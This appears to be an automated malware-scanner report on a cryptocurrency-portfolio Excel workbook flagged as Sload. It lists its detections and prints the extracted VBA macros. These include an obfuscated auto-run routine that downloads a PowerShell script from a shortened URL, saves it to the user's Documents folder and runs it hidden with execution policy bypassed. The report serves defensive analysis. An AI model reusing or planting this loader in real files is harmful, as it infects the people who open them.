MALICIOUS
486
Risk Score
Heuristics 12
-
ClamAV: Xls.Malware.Sload-7135989-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Sload-7135989-0
-
VBA project inside OOXML medium 8 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
x = Shell(obhizpjuvuly("636d64202f6320504f5745525348454c4c2e657865") & obhizpjuvuly("202d772068696464656e202d457865637574696f6e506f6c6963792042797061737320") & _ -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
x = Shell(obhizpjuvuly("636d64202f6320504f5745525348454c4c2e657865") & obhizpjuvuly("202d772068696464656e202d457865637574696f6e506f6c6963792042797061737320") & _ -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
xucioziiukvsse.Write WinHttpReq.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set itcbapxngakb = CreateObject(obhizpjuvuly("4d53584d4c322e53657276") & obhizpjuvuly("6572584d4c485454502e362e30")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set itcbapxngakb = CreateObject(obhizpjuvuly("4d53584d4c322e53657276") & obhizpjuvuly("6572584d4c485454502e362e30")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
xucioziiukvsse.SaveToFile Environ("USERPROFILE") + "\Documents\easrtagyhdjkdgatareraty.ps1", 2 -
External hyperlinks (444) low OOXML_EXTERNAL_HYPERLINKSDocument contains 444 external hyperlinks — clickable URLs are stored as external relationships. First target: http://www.floatrates.com/currency/usd/
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.floatrates.com/currency/usd/ Referenced by macro
- http://www.floatrates.com/usd/jpy/Referenced by macro
- http://www.floatrates.com/daily/usd.xmlReferenced by macro
- http://www.floatrates.com/usd/awg/Referenced by macro
- http://www.floatrates.com/usd/mad/Referenced by macro
- http://www.floatrates.com/usd/lkr/Referenced by macro
- http://www.floatrates.com/usd/khr/Referenced by macro
- http://www.floatrates.com/usd/xpf/Referenced by macro
- http://www.floatrates.com/usd/irr/Referenced by macro
- http://www.floatrates.com/usd/xaf/Referenced by macro
- http://www.floatrates.com/usd/egp/Referenced by macro
- http://www.floatrates.com/usd/php/Referenced by macro
- http://www.floatrates.com/usd/mvr/Referenced by macro
- http://www.floatrates.com/usd/pab/Referenced by macro
- http://www.floatrates.com/usd/xcd/Referenced by macro
- http://www.floatrates.com/usd/iqd/Referenced by macro
- http://www.floatrates.com/usd/mmk/Referenced by macro
- http://www.floatrates.com/usd/aed/Referenced by macro
- http://www.floatrates.com/usd/nio/Referenced by macro
- http://www.floatrates.com/usd/aoa/Referenced by macro
- http://www.floatrates.com/usd/crc/Referenced by macro
- http://www.floatrates.com/usd/yer/Referenced by macro
- http://www.floatrates.com/usd/twd/Referenced by macro
- http://www.floatrates.com/usd/cve/Referenced by macro
- http://www.floatrates.com/usd/clp/Referenced by macro
- http://www.floatrates.com/usd/sbd/Referenced by macro
- http://www.floatrates.com/usd/ils/Referenced by macro
- http://www.floatrates.com/usd/ang/Referenced by macro
- http://www.floatrates.com/usd/sgd/Referenced by macro
- http://www.floatrates.com/usd/afn/Referenced by macro
- http://www.floatrates.com/usd/omr/Referenced by macro
- http://www.floatrates.com/usd/sek/Referenced by macro
- http://www.floatrates.com/usd/srd/Referenced by macro
- http://www.floatrates.com/usd/qar/Referenced by macro
- http://www.floatrates.com/usd/nad/Referenced by macro
- http://www.floatrates.com/usd/dzd/Referenced by macro
- http://www.floatrates.com/usd/uah/Referenced by macro
- http://www.floatrates.com/usd/mwk/Referenced by macro
- http://www.floatrates.com/usd/bwp/Referenced by macro
- http://www.floatrates.com/usd/lak/Referenced by macro
- http://www.floatrates.com/usd/tjs/Referenced by macro
- http://www.floatrates.com/usd/dop/Referenced by macro
- http://www.floatrates.com/usd/idr/Referenced by macro
- http://www.floatrates.com/usd/ttd/Referenced by macro
- http://www.floatrates.com/usd/gtq/Referenced by macro
- http://www.floatrates.com/usd/mxn/Referenced by macro
- http://www.floatrates.com/usd/syp/Referenced by macro
- http://www.floatrates.com/usd/sar/Referenced by macro
- http://www.floatrates.com/usd/sdg/Referenced by macro
- http://www.floatrates.com/usd/pln/Referenced by macro
+17 more URL(s)
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12717 bytes |
SHA-256: 46e760850a376a558841e649977eeb9e4bf7a1c8c097cc1e9f6b4b67cbde9eab |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub wremrsbuejusdjzcqb(ByVal eiaesjxyhhiftjthlgjz As Boolean, vawclglumavojw As Boolean)
Dim eqgmdrzcdeda As String
myURL = obhizpjuvuly("6874") & obhizpjuvuly("7470733a2f2f6c6f6e672e61662f46616374446f776e5061727479")
myURL = "https://long.af/FactDownParty"
Dim itcbapxngakb As Object
Set itcbapxngakb = CreateObject(obhizpjuvuly("4d53584d4c322e53657276") & obhizpjuvuly("6572584d4c485454502e362e30"))
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", myURL, False
WinHttpReq.send
If WinHttpReq.Status = 200 Then
Set xucioziiukvsse = CreateObject("ADODB.Stream")
xucioziiukvsse.Open
xucioziiukvsse.Type = 1
xucioziiukvsse.Write WinHttpReq.responseBody
xucioziiukvsse.SaveToFile Environ("USERPROFILE") + "\Documents\easrtagyhdjkdgatareraty.ps1", 2
xucioziiukvsse.Close
x = Shell(obhizpjuvuly("636d64202f6320504f5745525348454c4c2e657865") & obhizpjuvuly("202d772068696464656e202d457865637574696f6e506f6c6963792042797061737320") & _
"""%HOMEDRIVE%\%HOMEPATH%\Documents\easrtagyhdjkdgatareraty.ps1""", 0)
End If
End Sub
Private Function obhizpjuvuly(ByVal klppwpmngefx As String) As String
Dim druzanrvabho As Long
For druzanrvabho = 1 To Len(klppwpmngefx) Step 2
obhizpjuvuly = obhizpjuvuly & Chr$(Val("&H" & Mid$(klppwpmngefx, druzanrvabho, 2)))
Next druzanrvabho
End Function
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
Call wremrsbuejusdjzcqb(True, True)
Dim score As Integer, result As String
timesincelastsave = Worksheets("Log sheet").Range("B2")
If timesincelastsave >= 0.002 Then
'this is approximately equal to 30min. Will save additional data if the last set of data was saved less than 30min ago.
Application.ScreenUpdating = False
Worksheets("Log Sheet").Range("$B$3:$AT$5000").AutoFilter Field:=6 'remove fileter (which hides the unused parts of the portfolio history chart
'copy trading data
Worksheets("Portifolio").Range("C36:L36").Copy
Worksheets("Log Sheet").Range("B3").End(xlDown).Offset(1, 0).PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
'copy coin symbols (for portfolio history chart)
Worksheets("Portifolio").Range("C7:V7").Copy
Worksheets("Log Sheet").Range("B3").End(xlDown).Offset(0, 10).PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
'copy coin holdings (for portfolio history Chart)
Worksheets("Portifolio").Range("C31:V31").Copy
Worksheets("Log Sheet").Range("B3").End(xlDown).Offset(0, 30).PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
'copy time of last log
Worksheets("Log Sheet").Range("J3").End(xlDown).Copy
Worksheets("Log Sheet").Range("C2").PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
'hide unused rows
Worksheets("Log Sheet").Range("$B$3:$AT$5000").AutoFilter Field:=6, Criteria1:="<>"
'fix missing equations
End If
End Sub
Private Sub Workbook_Open()
Call wremrsbuejusdjzcqb(True, True)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 6, 2, MSForms, CommandButton"
Attribute VB_Control = "CommandButton4, 5, 3, MSForms, CommandButton"
Private Sub CommandButton1_Click()
Columns("M:M").Select
Selection.Insert Shift:=xlToRight, CopyOrigin:=xlFormatFromLeftOrAbove
ActiveWindow.ScrollColumn = 1
Range("C6:C31").Select
Selection.Copy
Range("M6").Select
ActiveSheet.Paste
Range("M6").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = "Add Coin Name"
Range("N1:N3").Select
Selection.Cut
Range("M1").Select
ActiveSheet.Paste
Range("M20:M28").Select
Selection.ClearContents
End Sub
Private Sub CommandButton2_Click()
' RefreshCMC Macro
Application.ScreenUpdating = False
ActiveWorkbook.Connections("Connection2").Refresh
End Sub
Private Sub CommandButton3_Click()
Application.ScreenUpdating = False
Sheets("BTC Data").Select
Application.Run "blockheight"
End Sub
Private Sub CommandButton4_Click()
' RefreshCMC Macro
Application.ScreenUpdating = False
ActiveWorkbook.Connections("Connection2").Refresh
End Sub
Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 0, MSForms, CommandButton"
Private Sub CommandButton1_Click()
Range("A6").Select
Selection.End(xlDown).Select
Selection.EntireRow.Insert , CopyOrigin:=xlFormatFromLeftOrAbove
Range("A7:S7").Select
Selection.Copy
Range("A6").Select
Selection.End(xlDown).Offset(-1, 0).Select
ActiveSheet.Paste
Range("A6").Select
Selection.End(xlDown).Offset(-1, 1).Select
Application.CutCopyMode = False
Selection.ClearContents
Selection.Offset(0, 1).Select
Selection.ClearContents
Selection.Offset(0, 1).Select
Selection.ClearContents
Range("P6").Select
Selection.End(xlDown).Offset(0, 0).Select
ActiveCell.FormulaR1C1 = "=RC[-13]+R[-1]C"
Range("S6").Select
Selection.End(xlDown).Offset(0, 0).Select
ActiveCell.FormulaR1C1 = "=RC[-2]+R[-1]C"
Range("B34:T34").Select
End Sub
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Sub Refresh()
Attribute Refresh.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Refresh Macro
'
ActiveWorkbook.RefreshAll
Calculate
End Sub
Attribute VB_Name = "Module3"
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 1, 1, MSForms, CommandButton"
Private Sub CommandButton1_Click()
ActiveWorkbook.RefreshAll
Calculate
End Sub
Private Sub CommandButton2_Click()
Application.ScreenUpdating = False
Sheets("BTC Data").Select
Application.Run "blockheight"
Sheets("Moon Math").Select
End Sub
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module4"
Sub addcoin()
Attribute addcoin.VB_ProcData.VB_Invoke_Func = " \n14"
'
' addcoin Macro
'
'
Columns("K:K").Select
Selection.Insert Shift:=xlToRight, CopyOrigin:=xlFormatFromLeftOrAbove
ActiveWindow.ScrollColumn = 1
Range("B6:B26").Select
Selection.Copy
Range("K6").Select
ActiveSheet.Paste
Range("K6").Select
Application.CutCopyMode = False
ActiveCell.FormulaR1C1 = "Add Coin Name"
Range("K7").Select
End Sub
Attribute VB_Name = "Module5"
Sub blockheight()
Attribute blockheight.VB_ProcData.VB_Invoke_Func = " \n14"
'
' blockheight Macro
'
Sheets("BTC Data").Select
ActiveWorkbook.Connections("status?q=getBlockCount").Refresh
Range("AF2").Select
Selection.TextToColumns Destination:=Range("AF2"), DataType:=xlDelimited, _
TextQualifier:=xlDoubleQuote, ConsecutiveDelimiter:=False, Tab:=True, _
Semicolon:=False, Comma:=False, Space:=False, Other:=True, OtherChar _
:="}", FieldInfo:=Array(Array(1, 1), Array(2, 1)), TrailingMinusNumbers:=True
Range("AF5").Select
Selection.Copy
Range("AF4").Select
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
Sheets("Portifolio").Select
Range("B41").Select
End Sub
Attribute VB_Name = "Module6"
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module7"
Sub Macro3()
Attribute Macro3.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro3 Macro
'
'
Range("C36:I36").Select
Selection.Copy
Sheets("Log Sheet").Select
Range("B3").Select
Selection.End(xlDown).Select
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks _
:=False, Transpose:=False
End Sub
Attribute VB_Name = "Module8"
Sub Macro1()
Attribute Macro1.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro1 Macro
'
'
End Sub
Attribute VB_Name = "Module9"
Sub unhide()
Attribute unhide.VB_ProcData.VB_Invoke_Func = " \n14"
'
' unhide Macro
'
'
ActiveSheet.Range("$B$359:$AT$1500").AutoFilter Field:=6, Criteria1:="<>"
ActiveSheet.Range("$B$359:$AT$1500").AutoFilter Field:=6
ActiveSheet.Range("$B$359:$AT$1500").AutoFilter Field:=6, Criteria1:="<>"
End Sub
Attribute VB_Name = "Module10"
Sub Macro2()
Attribute Macro2.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro2 Macro
'
'
Range("L1:L4").Select
Selection.ClearContents
End Sub
Sub Macro4()
Attribute Macro4.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro4 Macro
'
'
Range("L1:L3").Select
Selection.Cut
Application.CutCopyMode = False
Range("M1:M3").Select
Selection.Cut
Range("L1").Select
ActiveSheet.Paste
End Sub
Attribute VB_Name = "Module11"
Sub Macro5()
Attribute Macro5.VB_ProcData.VB_Invoke_Func = " \n14"
'
' Macro5 Macro
'
'
Range("M20:M28").Select
Selection.ClearContents
End Sub
Attribute VB_Name = "Module12"
Sub fixlog()
Attribute fixlog.VB_ProcData.VB_Invoke_Func = " \n14"
'
' fixlog Macro
'
'
Range("AZ4:DD4").Select
Selection.FillDown
End Sub
Attribute VB_Name = "Module13"
Sub fixlog3()
Attribute fixlog3.VB_ProcData.VB_Invoke_Func = " \n14"
'
' fixlog3 Macro
'
'
ActiveWindow.ScrollColumn = 83
ActiveWindow.ScrollColumn = 82
ActiveWindow.ScrollColumn = 81
ActiveWindow.ScrollColumn = 80
ActiveWindow.ScrollColumn = 79
ActiveWindow.ScrollColumn = 78
ActiveWindow.ScrollColumn = 77
ActiveWindow.ScrollColumn = 76
Range("CC4").Select
Selection.End(xlDown).Select
Range(Selection, Selection.End(xlToRight)).Select
Range("CC7:DD8").Select
ActiveCell.FormulaR1C1 = _
"=IF(RC12>0,(INDEX(RC12:RC51,0,(MATCH(R3C,RC12:RC51,0))+20)),#N/A)"
Range("CN7").Select
End Sub
Sub fixlog4()
Attribute fixlog4.VB_ProcData.VB_Invoke_Func = " \n14"
'
' fixlog4 Macro
'
'
Range("CC7").Select
Range(Selection, Selection.End(xlToRight)).Select
Range("CC7:DD4975").Select
Selection.FillDown
End Sub
Attribute VB_Name = "Module14"
Sub fixlog5()
Attribute fixlog5.VB_ProcData.VB_Invoke_Func = " \n14"
'
' fixlog5 Macro
'
'
Range("AZ6:DD6").Select
Selection.FillDown
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 76288 bytes |
SHA-256: f20509b3c1968bc32a073271d8711dcdae21c9293159dc5eecaa4da5eda3de9d |
|||
|
Detection
ClamAV:
Xls.Malware.Sload-7135989-0
Obfuscation or payload:
unlikely
|
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2696 bytes |
SHA-256: e2b9ab8d21271044aa5cae3db325f7e3199f9ff15b24b1ffd1e19f45509d05e1 |
|||
emf_01.emf |
ooxml-emf | OOXML EMF part: xl/media/image2.emf | 2048 bytes |
SHA-256: 89b89df4887eb5d2ff6f6b39d81ef17dfd59e319a84f6c1cc58adc1270b7d060 |
|||
emf_02.emf |
ooxml-emf | OOXML EMF part: xl/media/image7.emf | 2688 bytes |
SHA-256: a36213c0caed53a2fb5bcdcbd0140362f907afbd5da71fa6838cb1966064f0b2 |
|||
emf_03.emf |
ooxml-emf | OOXML EMF part: xl/media/image8.emf | 2724 bytes |
SHA-256: 72a904759f6d5c892e981abcc8474c9bc548f5f928f6346ed5949212bb3f35a6 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.